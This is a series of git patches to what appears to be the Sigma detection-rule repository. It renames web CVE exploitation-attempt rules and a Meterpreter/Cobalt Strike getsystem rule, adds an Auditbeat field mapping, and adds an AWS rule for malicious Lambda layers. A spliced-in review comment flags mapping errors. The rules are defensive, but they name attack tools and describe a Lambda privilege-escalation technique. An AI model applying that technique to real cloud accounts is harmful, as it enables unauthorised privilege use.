web_cve_2010_1954_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1955_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1956_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1979_exploitation_attempt.yml} | 0 17 files changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve-2010-1535_exploitation_attempt.yml => web_cve_2010_1535_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1601_exploitation_attempt.yml => web_cve_2010_1601_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1602_exploitation_attempt.yml => web_cve_2010_1602_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1607_exploitation_attempt.yml => web_cve_2010_1607_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1657_exploitation_attempt.yml => web_cve_2010_1657_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1659_exploitation_attempt.yml => 
web_cve_2010_1659_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1714_exploitation_attempt.yml => web_cve_2010_1714_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1717_exploitation_attempt.yml => web_cve_2010_1717_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1718_exploitation_attempt.yml => web_cve_2010_1718_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1719_exploitation_attempt.yml => web_cve_2010_1719_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1722_exploitation_attempt.yml => web_cve_2010_1722_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1875_exploitation_attempt.yml => web_cve_2010_1875_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1953_exploitation_attempt.yml => web_cve_2010_1953_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1954_exploitation_attempt.yml => web_cve_2010_1954_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1955_exploitation_attempt.yml => web_cve_2010_1955_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1956_exploitation_attempt.yml => web_cve_2010_1956_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1979_exploitation_attempt.yml => web_cve_2010_1979_exploitation_attempt.yml} (100%) diff --git a/rules/web/web_cve-2010-1535_exploitation_attempt.yml b/rules/web/web_cve_2010_1535_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1535_exploitation_attempt.yml rename to rules/web/web_cve_2010_1535_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1601_exploitation_attempt.yml b/rules/web/web_cve_2010_1601_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1601_exploitation_attempt.yml rename to rules/web/web_cve_2010_1601_exploitation_attempt.yml 
diff --git a/rules/web/web_cve-2010-1602_exploitation_attempt.yml b/rules/web/web_cve_2010_1602_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1602_exploitation_attempt.yml rename to rules/web/web_cve_2010_1602_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1607_exploitation_attempt.yml b/rules/web/web_cve_2010_1607_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1607_exploitation_attempt.yml rename to rules/web/web_cve_2010_1607_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1657_exploitation_attempt.yml b/rules/web/web_cve_2010_1657_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1657_exploitation_attempt.yml rename to rules/web/web_cve_2010_1657_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1659_exploitation_attempt.yml b/rules/web/web_cve_2010_1659_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1659_exploitation_attempt.yml rename to rules/web/web_cve_2010_1659_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1714_exploitation_attempt.yml b/rules/web/web_cve_2010_1714_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1714_exploitation_attempt.yml rename to rules/web/web_cve_2010_1714_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1717_exploitation_attempt.yml b/rules/web/web_cve_2010_1717_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1717_exploitation_attempt.yml rename to rules/web/web_cve_2010_1717_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1718_exploitation_attempt.yml b/rules/web/web_cve_2010_1718_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1718_exploitation_attempt.yml rename to rules/web/web_cve_2010_1718_exploitation_attempt.yml 
diff --git a/rules/web/web_cve-2010-1719_exploitation_attempt.yml b/rules/web/web_cve_2010_1719_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1719_exploitation_attempt.yml rename to rules/web/web_cve_2010_1719_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1722_exploitation_attempt.yml b/rules/web/web_cve_2010_1722_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1722_exploitation_attempt.yml rename to rules/web/web_cve_2010_1722_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1875_exploitation_attempt.yml b/rules/web/web_cve_2010_1875_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1875_exploitation_attempt.yml rename to rules/web/web_cve_2010_1875_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1953_exploitation_attempt.yml b/rules/web/web_cve_2010_1953_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1953_exploitation_attempt.yml rename to rules/web/web_cve_2010_1953_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1954_exploitation_attempt.yml b/rules/web/web_cve_2010_1954_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1954_exploitation_attempt.yml rename to rules/web/web_cve_2010_1954_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1955_exploitation_attempt.yml b/rules/web/web_cve_2010_1955_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1955_exploitation_attempt.yml rename to rules/web/web_cve_2010_1955_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1956_exploitation_attempt.yml b/rules/web/web_cve_2010_1956_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1956_exploitation_attempt.yml rename to rules/web/web_cve_2010_1956_exploitation_attempt.yml 
diff --git a/rules/web/web_cve-2010-1979_exploitation_attempt.yml b/rules/web/web_cve_2010_1979_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1979_exploitation_attempt.yml rename to rules/web/web_cve_2010_1979_exploitation_attempt.yml From 44feb3ddf615657d05a0de8335ab8c7cfdc063b8 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 23 Sep 2021 14:46:13 +0200 Subject: [PATCH 1085/1367] fix filename --- ...ion_attempt.yml => web_cve_2010_1476_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1494_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1495_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1532_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1533_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1534_exploitation_attempt.yml} | 0 6 files changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve-2010-1476_exploitation_attempt.yml => web_cve_2010_1476_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1494_exploitation_attempt.yml => web_cve_2010_1494_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1495_exploitation_attempt.yml => web_cve_2010_1495_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1532_exploitation_attempt.yml => web_cve_2010_1532_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1533_exploitation_attempt.yml => web_cve_2010_1533_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1534_exploitation_attempt.yml => web_cve_2010_1534_exploitation_attempt.yml} (100%) diff --git a/rules/web/web_cve-2010-1476_exploitation_attempt.yml b/rules/web/web_cve_2010_1476_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1476_exploitation_attempt.yml rename to rules/web/web_cve_2010_1476_exploitation_attempt.yml 
diff --git a/rules/web/web_cve-2010-1494_exploitation_attempt.yml b/rules/web/web_cve_2010_1494_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1494_exploitation_attempt.yml rename to rules/web/web_cve_2010_1494_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1495_exploitation_attempt.yml b/rules/web/web_cve_2010_1495_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1495_exploitation_attempt.yml rename to rules/web/web_cve_2010_1495_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1532_exploitation_attempt.yml b/rules/web/web_cve_2010_1532_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1532_exploitation_attempt.yml rename to rules/web/web_cve_2010_1532_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1533_exploitation_attempt.yml b/rules/web/web_cve_2010_1533_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1533_exploitation_attempt.yml rename to rules/web/web_cve_2010_1533_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1534_exploitation_attempt.yml b/rules/web/web_cve_2010_1534_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1534_exploitation_attempt.yml rename to rules/web/web_cve_2010_1534_exploitation_attempt.yml From 934e39115937e76a18dd8a6a96c5131edc56ecc9 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Thu, 23 Sep 2021 14:51:59 +0200 Subject: [PATCH 1086/1367] fix filename --- rules/cloud/{ => aws}/aws_suspicious_saml_activity.yml | 0 ...ion_attempt.yml => web_cve_2010_0943_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_0944_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_0985_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1219_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1304_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1305_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1306_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1307_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1308_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1312_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1313_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1314_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1345_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1353_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1354_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1470_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1471_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1472_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1473_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1474_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1475_exploitation_attempt.yml} | 0 22 files changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{ => aws}/aws_suspicious_saml_activity.yml (100%) rename rules/web/{web_cve-2010-0943_exploitation_attempt.yml => web_cve_2010_0943_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-0944_exploitation_attempt.yml => web_cve_2010_0944_exploitation_attempt.yml} (100%) rename 
rules/web/{web_cve-2010-0985_exploitation_attempt.yml => web_cve_2010_0985_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1219_exploitation_attempt.yml => web_cve_2010_1219_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1304_exploitation_attempt.yml => web_cve_2010_1304_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1305_exploitation_attempt.yml => web_cve_2010_1305_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1306_exploitation_attempt.yml => web_cve_2010_1306_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1307_exploitation_attempt.yml => web_cve_2010_1307_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1308_exploitation_attempt.yml => web_cve_2010_1308_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1312_exploitation_attempt.yml => web_cve_2010_1312_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1313_exploitation_attempt.yml => web_cve_2010_1313_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1314_exploitation_attempt.yml => web_cve_2010_1314_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1345_exploitation_attempt.yml => web_cve_2010_1345_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1353_exploitation_attempt.yml => web_cve_2010_1353_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1354_exploitation_attempt.yml => web_cve_2010_1354_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1470_exploitation_attempt.yml => web_cve_2010_1470_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1471_exploitation_attempt.yml => web_cve_2010_1471_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1472_exploitation_attempt.yml => web_cve_2010_1472_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1473_exploitation_attempt.yml => web_cve_2010_1473_exploitation_attempt.yml} (100%) rename 
rules/web/{web_cve-2010-1474_exploitation_attempt.yml => web_cve_2010_1474_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1475_exploitation_attempt.yml => web_cve_2010_1475_exploitation_attempt.yml} (100%) diff --git a/rules/cloud/aws_suspicious_saml_activity.yml b/rules/cloud/aws/aws_suspicious_saml_activity.yml similarity index 100% rename from rules/cloud/aws_suspicious_saml_activity.yml rename to rules/cloud/aws/aws_suspicious_saml_activity.yml diff --git a/rules/web/web_cve-2010-0943_exploitation_attempt.yml b/rules/web/web_cve_2010_0943_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-0943_exploitation_attempt.yml rename to rules/web/web_cve_2010_0943_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-0944_exploitation_attempt.yml b/rules/web/web_cve_2010_0944_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-0944_exploitation_attempt.yml rename to rules/web/web_cve_2010_0944_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-0985_exploitation_attempt.yml b/rules/web/web_cve_2010_0985_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-0985_exploitation_attempt.yml rename to rules/web/web_cve_2010_0985_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1219_exploitation_attempt.yml b/rules/web/web_cve_2010_1219_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1219_exploitation_attempt.yml rename to rules/web/web_cve_2010_1219_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1304_exploitation_attempt.yml b/rules/web/web_cve_2010_1304_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1304_exploitation_attempt.yml rename to rules/web/web_cve_2010_1304_exploitation_attempt.yml 
diff --git a/rules/web/web_cve-2010-1305_exploitation_attempt.yml b/rules/web/web_cve_2010_1305_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1305_exploitation_attempt.yml rename to rules/web/web_cve_2010_1305_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1306_exploitation_attempt.yml b/rules/web/web_cve_2010_1306_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1306_exploitation_attempt.yml rename to rules/web/web_cve_2010_1306_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1307_exploitation_attempt.yml b/rules/web/web_cve_2010_1307_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1307_exploitation_attempt.yml rename to rules/web/web_cve_2010_1307_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1308_exploitation_attempt.yml b/rules/web/web_cve_2010_1308_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1308_exploitation_attempt.yml rename to rules/web/web_cve_2010_1308_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1312_exploitation_attempt.yml b/rules/web/web_cve_2010_1312_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1312_exploitation_attempt.yml rename to rules/web/web_cve_2010_1312_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1313_exploitation_attempt.yml b/rules/web/web_cve_2010_1313_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1313_exploitation_attempt.yml rename to rules/web/web_cve_2010_1313_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1314_exploitation_attempt.yml b/rules/web/web_cve_2010_1314_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1314_exploitation_attempt.yml rename to rules/web/web_cve_2010_1314_exploitation_attempt.yml 
diff --git a/rules/web/web_cve-2010-1345_exploitation_attempt.yml b/rules/web/web_cve_2010_1345_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1345_exploitation_attempt.yml rename to rules/web/web_cve_2010_1345_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1353_exploitation_attempt.yml b/rules/web/web_cve_2010_1353_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1353_exploitation_attempt.yml rename to rules/web/web_cve_2010_1353_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1354_exploitation_attempt.yml b/rules/web/web_cve_2010_1354_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1354_exploitation_attempt.yml rename to rules/web/web_cve_2010_1354_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1470_exploitation_attempt.yml b/rules/web/web_cve_2010_1470_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1470_exploitation_attempt.yml rename to rules/web/web_cve_2010_1470_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1471_exploitation_attempt.yml b/rules/web/web_cve_2010_1471_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1471_exploitation_attempt.yml rename to rules/web/web_cve_2010_1471_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1472_exploitation_attempt.yml b/rules/web/web_cve_2010_1472_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1472_exploitation_attempt.yml rename to rules/web/web_cve_2010_1472_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1473_exploitation_attempt.yml b/rules/web/web_cve_2010_1473_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1473_exploitation_attempt.yml rename to rules/web/web_cve_2010_1473_exploitation_attempt.yml 
diff --git a/rules/web/web_cve-2010-1474_exploitation_attempt.yml b/rules/web/web_cve_2010_1474_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1474_exploitation_attempt.yml rename to rules/web/web_cve_2010_1474_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1475_exploitation_attempt.yml b/rules/web/web_cve_2010_1475_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1475_exploitation_attempt.yml rename to rules/web/web_cve_2010_1475_exploitation_attempt.yml From aa96f21d0f380fdb60b77d164c2599ad2b8343de Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 23 Sep 2021 14:52:56 +0200 Subject: [PATCH 1087/1367] fix filename --- ...ity_meterpreter_or_cobaltstrike_getsystem_service_install.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/builtin/{win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml => win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml} (100%) diff --git a/rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml similarity index 100% rename from rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml rename to rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml From 35a710eec66f0cb4e0622b5d310800a185d84019 Mon Sep 17 00:00:00 2001 From: Steven Date: Thu, 23 Sep 2021 14:59:51 +0200 Subject: [PATCH 1088/1367] Added configuration for auditbeat, mapping to Elastic ECS --- tools/config/auditbeat.yml | 252 +++++++++++++++++++++++++++++++++++++ 1 file changed, 252 insertions(+) create mode 100644 tools/config/auditbeat.yml diff --git a/tools/config/auditbeat.yml b/tools/config/auditbeat.yml new file mode 100644 index 00000000..ae3e7788 --- /dev/null +++ b/tools/config/auditbeat.yml 
@@ -0,0 +1,252 @@ +title: Elastic Auditbeat (from 7.x) index pattern and field mapping following Elastic enabled Modules +order: 20 +backends: + - es-qs + - es-dsl + - es-rule + - es-rule-eql + - es-eql + - kibana + - kibana-ndjson + - xpack-watcher + - elastalert + - elastalert-dsl + - ee-outliers + +logsources: + linux_auditd: + product: linux + service: auditd + conditions: + event.provider: auditd + +defaultindex: auditbeat-* + +fieldmappings: + # https://www.elastic.co/guide/en/beats/auditbeat/current/exported-fields-auditd.html + a0: auditd.data.a0 + a1: auditd.data.a1 + a2: auditd.data.a2 + a3: auditd.data.a3 + acct: auditd.data.acct + acl: auditd.data.acl + action: auditd.data.action + added: auditd.data.added + addr: auditd.data.socket.addr + apparmor: auditd.data.apparmor + arch: auditd.data.arch + argc: auditd.data.argc + audit_backlog_limit: auditd.data.audit_backlog_limit + audit_backlog_wait_time: auditd.data.audit_backlog_wait_time + audit_enabled: auditd.data.audit_enabled + audit_failure: auditd.data.audit_failure + auid: user.auid + banners: auditd.data.banners + bool: auditd.data.bool + bus: auditd.data.bus + capability: auditd.data.capability + cap_fe: auditd.data.cap_fe + cap_fi: auditd.data.cap_fi + cap_fp: auditd.data.cap_fp + cap_fver: auditd.data.cap_fver + cap_pa: auditd.data.cap_pa + cap_pe: auditd.data.cap_pe + cap_pi: auditd.data.cap_pi + cap_pp: auditd.data.cap_pp + category: user.selinux.category + cgroup: auditd.data.cgroup + changed: auditd.data.changed + cipher: auditd.data.cipher + class: auditd.data.class + cmd: auditd.data.cmd + code: auditd.data.code + comm: auditd.data.comm + compat: auditd.data.compat + cwd: process.cwd + daddr: auditd.data.daddr + data: auditd.data.data + default-context: auditd.data.default-context + dev: auditd.paths.dev + device: auditd.data.device + dir: auditd.data.dir + direction: auditd.data.direction + dmac: auditd.data.dmac + dport: auditd.data.dport + enforcing: auditd.data.enforcing + entries: 
auditd.data.entries + exe: process.executable + exit: auditd.data.exit + fam: auditd.data.fam + family: auditd.data.family + fd: auditd.data.fd + file: auditd.data.file + flags: auditd.data.flags + fe: auditd.data.fe + feature: auditd.data.feature + fi: auditd.data.fi + fp: auditd.data.fp + format: auditd.data.format + fsgid: user.fsgid + fsuid: user.fsuid + fver: auditd.data.fver + gid: user.gid + grantors: auditd.data.grantors + grp: auditd.data.grp + hook: auditd.data.hook + hostname: auditd.data.hostname + icmp_type: auditd.data.icmp_type + id: auditd.data.id + igid: auditd.data.igid + Image: + img-ctx: auditd.data.img-ctx + inif: auditd.data.inif + ip: auditd.data.ip + ipid: auditd.data.ipid + ino: auditd.data.ino + inode: auditd.paths.inode + inode_gid: auditd.data.inode_gid + inode_uid: auditd.data.inode_uid + invalid_context: auditd.data.invalid_context + ioctlcmd: auditd.data.ioctlcmd + ipx-net: auditd.data.ipx-net + item: auditd.paths.item + items: auditd.data.items + iuid: auditd.data.iuid + kernel: auditd.data.kernel + kind: auditd.data.kind + ksize: auditd.data.ksize + laddr: auditd.data.laddr + len: auditd.data.len + lport: auditd.data.lport + list: auditd.data.list + mac: auditd.data.mac + macproto: auditd.data.macproto + maj: auditd.data.maj + major: auditd.data.major + minor: auditd.data.minor + mode: auditd.paths.mode + model: auditd.data.model + msg: auditd.data.msg + nargs: auditd.data.nargs + name: auditd.paths.name + nametype: auditd.paths.nametype + net: auditd.data.net + new: auditd.data.new + new-chardev: auditd.data.new-chardev + new-disk: auditd.data.new-disk + new-enabled: auditd.data.new-enabled + new-fs: auditd.data.new-fs + new_gid: auditd.data.new_gid + new-level: auditd.data.new-level + new_lock: auditd.data.new_lock + new-log_passwd: auditd.data.new-log_passwd + new-mem: auditd.data.new-mem + new-net: auditd.data.new-net + new_pe: auditd.data.new_pe + new_pi: auditd.data.new_pi + new_pp: auditd.data.new_pp + new-range: 
auditd.data.new-range + new-rng: auditd.data.new-rng + new-role: auditd.data.new-role + new-seuser: auditd.data.new-seuser + new-vcpu: auditd.data.new-vcpu + nlnk-fam: auditd.data.nlnk-fam + nlnk-grp: auditd.data.nlnk-grp + nlnk-pid: auditd.data.nlnk-pid + oauid: auditd.data.oauid + obj: auditd.data.obj + obj_gid: auditd.data.obj_gid + obj_uid: auditd.data.obj_uid + oflag: auditd.data.oflag + ogid: auditd.paths.ogid + ocomm: auditd.data.ocomm + old: auditd.data.old + old-auid: auditd.data.old-auid + old-chardev: auditd.data.old-chardev + old-disk: auditd.data.old-disk + old-enabled: auditd.data.old-enabled + old_enforcing: auditd.data.old_enforcing + old-fs: auditd.data.old-fs + old-level: auditd.data.old-level + old_lock: auditd.data.old_lock + old-log_passwd: auditd.data.old-log_passwd + old-mem: auditd.data.old-mem + old-net: auditd.data.old-net + old_pa: auditd.data.old_pa + old_pe: auditd.data.old_pe + old_pi: auditd.data.old_pi + old_pp: auditd.data.old_pp + old_prom: auditd.data.old_prom + old-range: auditd.data.old-range + old-rng: auditd.data.old-rng + old-role: auditd.data.old-role + old-ses: auditd.data.old-ses + old-seuser: auditd.data.old-seuser + old_val: auditd.data.old_val + old-vcpu: auditd.data.old-vcpu + op: auditd.data.op + opid: auditd.data.opid + oses: auditd.data.oses + ouid: auditd.paths.ouid + outif: auditd.data.outif + parent: auditd.data.parent + path: source.path + per: auditd.data.per + perm: auditd.data.perm + perm_mask: auditd.data.perm_mask + permissive: auditd.data.permissive + pfs: auditd.data.pfs + printer: auditd.data.printer + prom: auditd.data.prom + proctitle: proctitle + proto: auditd.data.proto + qbytes: auditd.data.qbytes + range: auditd.data.range + rdev: auditd.paths.rdev + reason: auditd.data.reason + removed: auditd.data.removed + res: auditd.data.res + resrc: auditd.data.resrc + result: auditd.result + role: user.selinux.role + rport: auditd.data.rport + saddr: auditd.data.socket.saddr + sauid: auditd.data.sauid + 
scontext: auditd.data.scontext + selected-context: auditd.data.selected-context + seperm: auditd.data.seperm + seqno: auditd.data.seqno + seperms: auditd.data.seperms + seresult: auditd.data.seresult + ses: auditd.data.ses + seuser: auditd.data.seuser + sgid: user.sgid + sig: auditd.data.sig + sigev_signo: auditd.data.sigev_signo + smac: auditd.data.smac + spid: auditd.data.spid + sport: auditd.data.sport + state: auditd.data.state + subj: auditd.data.subj + success: auditd.data.success + suid: user.suid + syscall: auditd.data.syscall + table: auditd.data.table + TargetFileName: auditd.data.file + tclass: auditd.data.tclass + tcontext: auditd.data.tcontext + terminal: auditd.data.terminal + tty: auditd.data.tty + type: user.selinux.domain + uid: user.uid + unit: auditd.data.unit + uri: auditd.data.uri + user: user.selinux.user + uuid: auditd.data.uuid + val: auditd.data.val + ver: auditd.data.ver + virt: auditd.data.virt + vm: auditd.data.vm + vm-ctx: auditd.data.vm-ctx + vm-pid: auditd.data.vm-pid + watch: auditd.data.watch From 9e9fd4c23d88d3752eeb04b1d0e14eed8793f5e4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 23 Sep 2021 08:37:20 -0500 Subject: [PATCH 1089/1367] Create aws_attached_malicious_lambda_layer.yml --- .../aws_attached_malicious_lambda_layer.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/aws/aws_attached_malicious_lambda_layer.yml diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml new file mode 100644 index 00000000..a57e61df --- /dev/null +++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml 
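Review bot: `Image:` in the fieldmappings block (right after `igid`) has no value, so the YAML parses it as a null mapping and any rule that uses `Image` is rewritten to a field that does not exist; either drop the key or give it a target such as `Image: process.executable`, the same Auditbeat field that `exe` already maps to. The `type: user.selinux.domain` entry also deserves a second look: as far as I recall, the Linux auditd rules in this repository use `type` for the audit record type (SYSCALL, EXECVE, …), so this mapping would turn those conditions into a SELinux-domain filter that never matches — I believe Auditbeat carries the record type in `auditd.message_type` (lower-cased), which is the mapping to confirm against a sample event before relying on it. The later 'Fix yamllint' patch re-indents this whole block; its hunk runs past the end of this view.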
@@ -0,0 +1,21 @@ +title: AWS Attached Malicious Lambda Layer +id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d +description: Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. +author: Austin Songer +status: experimental +date: 2021/09/23 +references: + - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html +logsource: + service: cloudtrail +detection: + selection: + eventSource: lambda.amazonaws.com + eventName: UpdateFunctionConfiguration + condition: selection +level: low +tags: + - attack.privilege_escalation +falsepositives: + - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making 